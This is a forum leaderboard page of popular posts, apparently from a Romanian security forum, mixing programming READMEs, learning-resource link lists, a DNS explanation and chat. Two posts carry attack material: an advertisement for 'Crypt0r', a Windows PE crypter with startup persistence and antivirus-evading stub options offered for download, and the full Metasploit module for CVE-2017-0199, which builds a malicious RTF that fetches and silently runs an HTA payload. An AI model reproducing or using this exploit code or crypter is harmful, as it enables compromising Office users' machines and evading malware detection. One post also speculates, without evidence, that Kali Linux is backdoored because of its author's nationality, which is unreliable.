Leaderboard
Popular Content
Showing content with the highest reputation on 08/07/17 in all areas
-
3 points
-
@hocs A collection of Higher-Order Components for React, especially useful with Recompose. A Higher-Order Component is a function that takes a component and returns a new component. Packages omit-props Helps to omit unnecessary context, state setters or anything else you don't want to propagate with {...spread}. with-lifecycle Provides a handy way to use some of React Component Lifecycle methods. with-match-media-props Dynamically map CSS Media Queries matches to boolean props using window.matchMedia() (Can I use?). debounce-handler Helps to debounce handlers like onChange. throttle-handler Helps to throttle handlers like onChange. prevent-handlers-default Decouples e.preventDefault() side effect from handlers like form submitting or clicking a link. …and more to come You can follow me on Twitter for updates. Development Create a new folder in packages/, let's say with-foo. See package.json in already existing packages and create new with-foo/package.json. Put source code in with-foo/src/, it will be transpiled and bundled into with-foo/dist/, with-foo/lib/ and with-foo/es/. Put tests written with Jest in with-foo/test/. Put demo in with-foo/demo/, it will be rendered and wrapped with HMR. Available scripts using Start: yarn start build <package> yarn start demo <package> yarn start test yarn start testWatch yarn start lint Download hocs-master.zip Source: https://github.com/deepsweet/hocs2 points
-
2 points
-
Awesome Hacking A collection of awesome lists for security researchers. Source: https://github.com/Hack-with-Github/Awesome-Hacking/blob/master/README.md2 points
-
A couple of weeks ago I did a test installing a bare Debian 9 VM. Then I started to add top 50 tools from Kali Linux. To be honest, this VM is working like a charm atm without all the other unnecessary bull shit which is coming by default with Kali Linux. Overall, you have to understand this distro was built mainly by an Israeli dude and that should raise some concerns. Don't get me wrong, it is an amazing distro but once its popularity grew among security professionals, some interests into have it "backdoored" probably elevated as well. There is also the BlackArch alternative which overall is way more time consuming from tweaking perspective. Also, personally, I found Arch being slightly unfriendly with VMWARE workstation and very sensitive to different kernel changes. But this is just a personal opinion.2 points
-
Crypt0r is an PE crypter coded in both Delphi 7 and C++. Coded by wrh1d3 -> wrh1d3@gmail.com / wrh1d3@xmpp.jp. Main features: - CryptoGear encryption cipher (by Viotto, https://Breaking-Security.com); - Stub installation and registry startup; - Error message box display; - PE assembly cloner (verpatch); - Icon changer; - Stub size pumper; - Small stub size (17 KB); - Stub compression (UPX). Dependencies (source code): - Borland Delphi 7 IDE for GUI - Dev-C++ 5.11 IDE for Console and Stub Tested on Windows 8 Professionnal x86. https://www.sendspace.com/file/n62ezh1 point
-
Learn C# by Building a Simple RPG " If you want to write a Role Playing Game, but don’t know how to program, or just want to learn how to program in C#, then you’re at right the place. These lessons will take you from a complete beginner to being an author of a Role Playing Game, for free. Now, this isn’t the world’s greatest game. In fact, it’s very short and kind of ugly. However, as you create it, you’ll learn the most common C# programming practices and techniques. Then, if you want, you can improve the game, adding more features and your own special touch to it... " Sources: [-] https://scottlilly.com/learn-c-by-building-a-simple-rpg-index/ [-] https://roguesharp.wordpress.com/1 point
-
raw text: https://a.doko.moe/qusujl.txt iacata dovada http://dropmefiles.com/uFVLj:1 point
-
Nivel 0: https://cs50.harvard.edu/weeks - Asm & Api: Limbaj de Asamblare (Assembler) Intel 8086 Windows Assembly Language Megaprimer Iczelion's Win32 Assembly Silences Programming Tour with MASM32 Intel Pentium Instruction Set Reference Functii Api - MSDN Library Undocumented Functions Reverse engineering: TiGa's Video Tutorial Series on IDA Pro Lenas Reversing for Newbies IDA Pro Binary Auditing Training R4ndom’s Beginning Reverse Engineering Ricardo Narvaja Tutorials [introduction to cracking with Olly from zero] https://drive.google.com/drive/folders/0B13TW0I0f8O2ckd2T0lsbXRoYmc Reversing with IDA PRO from scratch Kani Cracking tutorials https://rstforums.com/forum/topic/106449-nsa-capstone-course-reverse-engineering/ NSA Capstone Course - Reverse Engineering Analiza malware: Dr. Fu's Malware Analysis Tutorials F-Secure Malware Analysis Course Reversing & Malware Analysis Training, Advanced Malware Analysis Training https://github.com/RPISEC/Malware Malware Analysis at Rensselaer Polytechnic Institute Exploits/shellcode: Corelan Exploit writing tutorial Neox Training Center Exploit Research Megaprimer Fuzzy security - Exploit Development Tutorial Shellcode Tutorials Memory forensics: Introduction to Volatility Scripting: Google's Python Class Open Security Training Training -un site ce isi merita propria categorie Tools: RCE tool library Diverse: Goppit PE file format Cheat sheets: quickly code, quick reference Online automated malware analysis: Malwr (Windows executable, PDF) https://www.hybrid-analysis.com/ https://any.run/ ThreatExpert (Windows executable) CWSandbox (Windows executable) JSUNPACK (PDF, pcap, HTML, or JavaScript) malware tracker (Shellcode Analysis, PDF, Doc ) Document Analyzer (.pdf, .doc, .ppt, .xls, .docx, .pptx, .xlsx, .rtf) Mobile Sandbox (APK Analysis) https://detux.org/index.php (Linux Sandbox x86, x86-64, ARM, MIPS and MIPSEL) SandDroid (APK Analysis Sandbox) https://linux.huntingmalware.com/#1 point
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => "Microsoft Office Word Malicious Hta Execution", 'Description' => %q{ This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in how a olelink object can make a http(s) request, and execute hta code in response. This bug was originally seen being exploited in the wild starting in Oct 2016. This module was created by reversing a public malware sample. }, 'Author' => [ 'Haifei Li', # vulnerability analysis 'ryHanson', 'wdormann', 'DidierStevens', 'vysec', 'Nixawk', # module developer 'sinn3r' # msf module improvement ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2017-0199'], ['URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/'], ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html'], ['URL', 'https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/'], ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html'], ['URL', 'https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html'], ['URL', 'https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf'], ['URL', 'https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/'], ['URL', 'https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100'], ['URL', 'https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/'], ['URL', 'https://www.microsoft.com/en-us/download/details.aspx?id=10725'], ['URL', 'https://msdn.microsoft.com/en-us/library/dd942294.aspx'], ['URL', 'https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf'], ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199'] ], 'Platform' => 'win', 'Targets' => [ [ 'Microsoft Office Word', {} ] ], 'DefaultOptions' => { 'DisablePayloadHandler' => false }, 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => 'Apr 14 2017')) register_options([ OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']), OptString.new('URIPATH', [ true, 'The URI to use for the HTA file', 'default.hta']) ], self.class) end def generate_uri uri_maxlength = 112 host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST'] scheme = datastore['SSL'] ? 'https' : 'http' uri = "#{scheme}://#{host}:#{datastore['SRVPORT']}#{'/' + Rex::FileUtils.normalize_unix_path(datastore['URIPATH'])}" uri = Rex::Text.hexify(Rex::Text.to_unicode(uri)) uri.delete!("\n") uri.delete!("\\x") uri.delete!("\\") padding_length = uri_maxlength * 2 - uri.length fail_with(Failure::BadConfig, "please use a uri < #{uri_maxlength} bytes ") if padding_length.negative? padding_length.times { uri << "0" } uri end def create_ole_ministream_data # require 'rex/ole' # ole = Rex::OLE::Storage.new('cve-2017-0199.bin', Rex::OLE::STGM_READ) # ministream = ole.instance_variable_get(:@ministream) # ministream_data = ministream.instance_variable_get(:@data) ministream_data = "" ministream_data << "01000002090000000100000000000000" # 00000000: ................ ministream_data << "0000000000000000a4000000e0c9ea79" # 00000010: ...............y ministream_data << "f9bace118c8200aa004ba90b8c000000" # 00000020: .........K...... ministream_data << generate_uri ministream_data << "00000000795881f43b1d7f48af2c825d" # 000000a0: ....yX..;..H.,.] ministream_data << "c485276300000000a5ab0000ffffffff" # 000000b0: ..'c............ ministream_data << "0609020000000000c000000000000046" # 000000c0: ...............F ministream_data << "00000000ffffffff0000000000000000" # 000000d0: ................ ministream_data << "906660a637b5d2010000000000000000" # 000000e0: .f`.7........... ministream_data << "00000000000000000000000000000000" # 000000f0: ................ ministream_data << "100203000d0000000000000000000000" # 00000100: ................ ministream_data << "00000000000000000000000000000000" # 00000110: ................ ministream_data << "00000000000000000000000000000000" # 00000120: ................ ministream_data << "00000000000000000000000000000000" # 00000130: ................ ministream_data << "00000000000000000000000000000000" # 00000140: ................ ministream_data << "00000000000000000000000000000000" # 00000150: ................ ministream_data << "00000000000000000000000000000000" # 00000160: ................ ministream_data << "00000000000000000000000000000000" # 00000170: ................ ministream_data << "00000000000000000000000000000000" # 00000180: ................ ministream_data << "00000000000000000000000000000000" # 00000190: ................ ministream_data << "00000000000000000000000000000000" # 000001a0: ................ ministream_data << "00000000000000000000000000000000" # 000001b0: ................ ministream_data << "00000000000000000000000000000000" # 000001c0: ................ ministream_data << "00000000000000000000000000000000" # 000001d0: ................ ministream_data << "00000000000000000000000000000000" # 000001e0: ................ ministream_data << "00000000000000000000000000000000" # 000001f0: ................ ministream_data end def create_rtf_format template_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2017-0199.rtf") template_rtf = ::File.open(template_path, 'rb') data = template_rtf.read(template_rtf.stat.size) data.gsub!('MINISTREAM_DATA', create_ole_ministream_data) template_rtf.close data end def on_request_uri(cli, req) p = regenerate_payload(cli) data = Msf::Util::EXE.to_executable_fmt( framework, ARCH_X86, 'win', p.encoded, 'hta-psh', { :arch => ARCH_X86, :platform => 'win' } ) # This allows the HTA window to be invisible data.sub!(/\n/, "\nwindow.moveTo -4000, -4000\n") send_response(cli, data, 'Content-Type' => 'application/hta') end def exploit file_create(create_rtf_format) super end end Sursa: https://www.exploit-db.com/exploits/41934/1 point
-
https://www.sendspace.com/file/zry9w3 CVE nou: https://github.com/bhdresh/CVE-2017-01991 point
-
An awesome workflow for animated SVGs with Adobe Illustrator A simple set of python functions to help working with animated SVGs exported from Illustrator. More features coming soon! We used it to create animations like this. Viva La Velo Overview Part of animating with SVGs is getting references to elements in code and passing them to animation functions. For complicated animations this becomes difficult and hand editing SVG code is slow and gets overwritten when your artwork updates. We decided to write a post-processer for SVGs produced by Illustrator to help speed this up. Layer names are used to create attributes, classes and ID's making selecting them in JS or CSS far easier. Quick Example Download the svg tools and unzip them into your project folder. Create an Illustrator file, add an element and change its layer name to say #class=my-element. Export the SVG using the File > Export > Export for Screens option with the following settings. Call the svg animation.svg. Create a HTML file as below. The import statements inline the SVG inline into our HTML file so we don't have to do any copy and pasting. Not strictly neccessary but makes the workflow a little easier. Save it as animation.html. <!DOCTYPE html> <html> <head> <meta charset='utf-8'/> </head> <body> //import processed_animation.svg </body> </html> Open the file called run.py. Here you can edit how the SVGs will be processed. The default looks like this. The sections below describe what the various options do. from svg import * compile_svg('animation.svg', 'processed_animation.svg', { 'process_layer_names': True, 'namespace' : 'example' }) inline_svg('animation.html', 'output/animation.html') Open the command line and navigate to your project folder. Call the script using python parallax_svg_tools/run.py. You should see a list of processed files (or just one in this case) printed to the console if everything worked correctly. Note that the script must be called from a directory that has access to the svg files. There should now be a folder called output containing an animation.html file with your processed SVG in it. All that is left to do is animate it with your tool of choice (ours is GSAP). Functions process_svg(src_path, dst_path, options) Processes a single SVG and places it in the supplied destination directory. The following options are available. process_layer_names: Converts layer names as defined in Illustator into attributes. Begin the layer name with a '#' to indicate the layer should be parsed. For example #id=my-id, class=my-class my-other-class, role=my-role ...etc. This is useful for fetching elements with Javascript as well as marking up elements for accessibility - see this CSS Tricks Accessible SVG article. You can also use origin=100 100 to set origins for rotating/scaling with GSAP (expands to data-svg-origin). NOTE: Requires using commas to separate the attributes as that makes the parsing code a lot simpler namespace: Appends a namespace to classes and IDs if one is provided. Useful for avoiding conflicts with other SVG files for things like masks and clipPaths. nowhitespace: Removes unneeded whitespace. We don't do anything fancier than that so as to not break animations. Use the excellent SVGO if you need better minification. attributes: An object of key:value strings that will be applied as attributes to the root SVG element. inline_svg(src_path, dst_path) In order to animate SVGs code needs to be placed in-line. This function will look at the source HTML and include any references defined by //import statements to SVGs that it finds. Download Source: https://github.com/parallax/svg-animation-tools1 point
-
Imi vine sa rad si acum .. cand vad cum a zis asta " panic sellers " ... PANIC SELLERS ??????? PRETUL A CRESCUT CU 500 $ ... PANICATULE :))))1 point
-
https://twitter.com/makassarhack repository: http://repo.meh.or.id/ while dorking gasit, postat: https://blkbx.info/Downloads/MEGA/CyberSec/1 point
-
1 point
-
https://www.google.ro/url?sa=t&source=web&rct=j&url=https://kali.training/downloads/Kali_Revealed_1st_edition.pdf&ved=0ahUKEwiWwIashMHVAhUmBsAKHQm5AUkQFgg6MAI&usg=AFQjCNH_AFhd01P94GWXFa8emEsn-Ngb-Q1 point
-
Ar fi interesant sa vedem ca "cineva" a avut acces la serverele lor si a introdus acel backdoor. Oricum, dat fiind faptul ca distributia e folosita de multi din domeniul IT security, nu ar fi de mirare sa aiba ceva mai bine ascuns, cu sau fara intentie. Acum ca a aparut si cartea, face cineva un kali from scratch sa putem compara cu binarul (iso) lor?1 point
-
Nu ai nevoie de asa ceva. Ce faci daca nu iei destul de fin pasul? Te contrazici oarecum. Indiferent, asta tine de limbaj/api. Ecuatia dreptei este y = m*x + b sau f(x) = m*x + b. Tu ai doua seturi de puncte p1(x1, y1) si p2(x2, y2). Mai intai trebuie sa aflii panta dreptei (adica m) care este data de ecuatia m = (y2 - y1)/(x2 - x1). De notat cazul special x2 - x1 = 0 caz in care dreapta este paralela cu Oy, la distata b de Oy. Acum ne trebuie si coordonata la origine (adica b) care este data de ecuatia b = y1 - m*x1 sau b = y2 - m*x2. Explicatia video https://www.youtube.com/watch?v=Ac-XXjFdR_c. Pentru a determina pozitia unui punct fata de dreapta (in cazul in care descrii tu) tot ce trebuie sa faci este sa folosesti ecuatia dreptei, in care vei inlocui x cu x3 (unde x3 este coordonata x a punctului p3 a carui pozitie vrei sa o determini). Daca rezultatul este mai mic decat y3 atunci punctul este deasupra dreptei, daca este egal, punctul este pe dreapta, iar daca este mai mare, punctul se afla sub dreapta. Pentru cazul special in care dreapta este paralela cu Oy, compari x3 cu b: daca este mai mic, punctul e in stanga dreptei, daca este egal, punctul se afla pe dreapta, iar daca este mai mare, punctul se alfa la dreapta dreptei. Sper sa te ajute.1 point
-
1 point
-
Stai ca vorbim in dodii acum... Cine ? Am plecat de la a nu putea sa joci pe bwin din RO si am ajuns la discutii ezoterice. Cand accesezi un website, sa zicem www.example.com, au loc urmatoarele evenimente: Se face un query DNS pentru inregistrarile de tip A sau AAAA (adica IPv4 sau IPv6) pentru www.example.com catre server-ul/server-ele DNS setate in PC; daca oricare din ele stiu raspunsul, sari la pasul 5; altfel intrebi serverele DNS radacina (domeniile sunt o structura aborescenta: exista un numar predeterminat de servere radacina ce contin adresele serverelor DNS ce administreaza diferitele Top Level Domain); comunicatiile DNS se fac pe portul 53 UDP (sau TCP) Server-ul radacina va raspunde ca nu stie ce adresa are www.example.com dar stie ca toate domeniile .com sunt administrate de urmatoarele servere, asa ca intreaba acolo. Server-ul .com va raspunde ca nu stie adresa, dar stie ca example.com e administrat de urmatoarele servere, asa ca intreaba acolo Server-ul example.com va da adresele cerute pentru www.example.com. Browserul va deschide o conexiune TCP la adresa primita de la server-ul DNS pe portul 80 (daca vorbim de http; daca folosim https, portul implicit este 443) Dupa ce conexiunea este deschisa, va trimite un request GET pentru a primi continutul paginii marcate in configuratia webserver-ului ca index. Dupa ce primeste continutul paginii respective, analizeaza pagina si vede ce resurse sunt necesare si reia procesul pentru fiecare resursa. Acum, daca vorbim de o persoana ce iti intercepteaza traficul (sa zicem traficul wireless), atunci da, acea persoana poate vedea ce website-uri accesezi urmarind ce domenii cauta pc-ul. Dar am pornit de la problema identificarii browser-ului de catre un website, atunci cand schimbi IP-ul. Ceea ce nu se poate realiza cu ajutorul DNS-ului.1 point
-
Hi all, while surfing various IRC Channels, i have come across a list of very useful links, courses to get into hacking URL: https://ghostbin.com/paste/j858d There are courses for computer basics, hacking, programming and many more Good luck in your long journey of learning!1 point
-
1 point
-
@Che https://brainly.ro/tema/714802 gasesti exact ce te intereseaza pe forumul asta: http://www.cplusplus.com Mi-ati editat postul. Ba, ce oameni! Mno, ti-ai incordat muschii. mi-ai aratat cine e sefu'. Ceva noutati?-1 points